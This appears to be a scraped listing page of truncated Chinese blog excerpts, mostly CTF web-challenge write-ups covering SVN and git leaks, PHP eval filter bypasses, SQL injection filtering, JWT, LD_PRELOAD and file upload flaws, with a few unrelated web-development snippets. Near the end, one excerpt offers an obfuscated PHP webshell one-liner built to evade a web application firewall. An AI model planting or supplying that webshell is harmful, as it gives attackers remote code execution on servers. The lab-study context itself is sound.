靶场polar web

## WEB基础 ### 二、信息泄露 #### 5、SVN泄露 当开发人员使用 SVN 进行版本控制，对站点自动部署。如果配置不当,可能会将.svn文件夹直接部署到线上环境。这就引起了 SVN 泄露漏洞。 - 从网上搜了下关于利用svn漏洞的工具，有一个是svnExploit，但是好像由于配置的原 ......

if(preg_match("/system|exec|highlight/i",$c)){ eval($c); }else{ die("cmd error"); } 提交的参数中必须包含 system，exec，highlight其中一个关键字，才能使用 eval()函数执行PHP代码 wp1 w ......

一、总结 二、流程详解 总流程可以参照 WEB-RTC 基础概念和架构 的第二部分，本篇是对这个流程的 FE 代码的一个梳理： (一) 前期准备 首先发起端(以下统称 Client A 或者 A)通过 mediaDevices 原生接口获取当前设备的一些媒体输入/输出流(或者轨道，track)，这一 ......

[TOC] # indexof slice splice ```javascript a=[1,2,3,4,5,6]; b=[100,200,[11,22,33]]; console.log(a.indexOf(3)); console.log(b.indexOf(22)); console.log ......

在当今的软件开发领域，RESTful API已经成为了一种主流的接口设计风格。通过使用RESTful原则，我们能够构建出高效、可扩展的Web应用程序。本文将详细介绍RESTful API的概念、优势、应用场景以及常见问题和解决方案，旨在帮助读者更好地掌握这一技术。 一、RESTful API概述 R ......

if(preg_match("/or|\+/i",$id)){ die("id error"); } "/i是正则表达式的转意语句，不是过滤了i，其作用是不区分大小写，也就是说OR\Or\oR\or这几个都不能用了" wp1 or和+都不能用了 /?id=100*10 (对于web1也是适用的 ......

PHP intval() 函数 wp1 wp2 intval()函数和mysql limit用法 ......

页面加载是Web组件的基本功能。根据页面加载数据来源可以分为三种常用场景，包括加载网络页面、加载本地页面、加载HTML格式的富文本数据。 页面加载过程中，若涉及网络资源获取，需要配置ohos.permission.INTERNET网络访问权限。 加载网络页面 开发者可以在Web组件创建的时候指定默认 ......

## WEB基础 ### 一、web前置技能树（http协议） #### 1、请求方式 本关卡的要求是改变请求的方式，将get请求修改为CTFHUB请求 ![](https://img2023.cnblogs.com/blog/3257724/202308/3257724-2023083017421 ......

@[TOC](web) > 本系列侧重方法论，各工具只是实现目标的载体。 > 命令与工具只做简单介绍，其使用另见《安全工具录》。 > 靶场参考：upload-labs。 # 1：文件上传漏洞 **文件上传漏洞**，指程序对文件的上传未作全面限制，导致用户可以上传一些超越用户权限的文件。可以是木马，s ......

1. 判断过滤哪些关键词和字符 使用Burp Suite的Intruder，字典内容就是常见的SQL注入的一些函数名、符号等。 buuoj有访问限制，访问太快会提示429 Too Many Requests，所以，需要设置一下延时。 ![](https://img2023.cnblogs.com/b ......

基础知识 JWT原理 JWT 的原理是，服务器认证以后，生成一个 JSON 对象，发回给用户，就像下面这样。 ``` { "姓名": "张三", "角色": "管理员", "到期时间": "2018年7月1日0点0分" } ``` 以后，用户与服务端通信的时候，都要发回这个 JSON 对象。服务器完 ......

动态加载器 参考资料： https://www.wolai.com/ctfhub/4YqbrWboUwvdxqXmPHW9EQ https://zhuanlan.zhihu.com/p/235551437 ![images](https://img2023.cnblogs.com/blog/1845 ......

LD_PRELOAD 页面源码： ``` CTFHub Bypass disable_function —— LD_PRELOAD 本环境来源于AntSword-Labs CTFHub Bypass disable_function —— LD_PRELOAD CTFHub Bypass disab ......

python2版本 #mac举例 #1、进入控制台 #2、cd 到指定目录 cd /Users/apple/Downloads #3、启动服务 python2 -m SimpleHTTPServer 8080 #4、访问 http://局域网ip:8080/文件名 python3版本 #mac举例 ......

 这个题目告诉我，正则表达式还要好好的学一下；； ![images](https://img2023. ......

 sha数组绕过问题，和md5类似方法：： ``` <?php highlight_file('fla ......

 后台扫描发现有robots.txt ![images](https://img2023.cnblogs ......

不能放过任何提示或是编码：  参考博客：： [https://blog.csdn.net/qq_4120 ......

 这题考察的是git信息泄露，挺好的题目；；我都不懂git信息泄露是什么鬼 用dirsearch扫描后 ......

 该题目涉及到了序列化；Base64解码；cgi；ssrf；php中的file协议； 代码审计，我只知 ......

 一： 学到了一个挺有意思的文件包含代码：： ``` ``` ![images](https://img ......

 访问css样式之后得到提示： ![images](https://img2023.cnblogs.c ......

 这个题目对于我来说还是很有难度的；；；毕竟我菜；；；唉；；； 打开页面是个登录界面：： ![imag ......

 传入cipher：： o0Na0VUpA9NNqK5lQTP3chZqec57H%2FAMEkq5Y ......

 php序列化的一个题目；； 参考博客：[https://blog.csdn.net/weixin_4 ......

 ![images](https://img2023.cnblogs.com/blog/1845942 ......

 ![images](https://img2023.cnblogs.com/blog/1845942 ......

送给大家一个过狗一句话 `$poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])` ![i ......

 5 ![images](https://img2023.cnblogs.com/blog/18459 ......